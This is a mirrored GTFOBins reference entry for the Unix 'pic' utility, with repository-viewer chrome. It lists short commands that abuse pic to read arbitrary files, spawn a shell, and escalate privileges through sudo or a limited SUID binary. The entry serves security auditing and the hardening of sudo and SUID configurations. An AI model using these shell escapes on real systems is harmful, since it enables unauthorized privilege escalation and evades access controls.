mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
dab2e88a30
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
24 lines
384 B
Markdown
24 lines
384 B
Markdown
---
|
|
functions:
|
|
file-read:
|
|
- description: The output is prefixed with a some content as a header.
|
|
code: |
|
|
LFILE=file_to_read
|
|
pic $LFILE
|
|
shell:
|
|
- code: |
|
|
pic -U
|
|
.PS
|
|
sh X sh X
|
|
sudo:
|
|
- code: |
|
|
sudo pic -U
|
|
.PS
|
|
sh X sh X
|
|
limited-suid:
|
|
- code: |
|
|
./pic -U
|
|
.PS
|
|
sh X sh X
|
|
---
|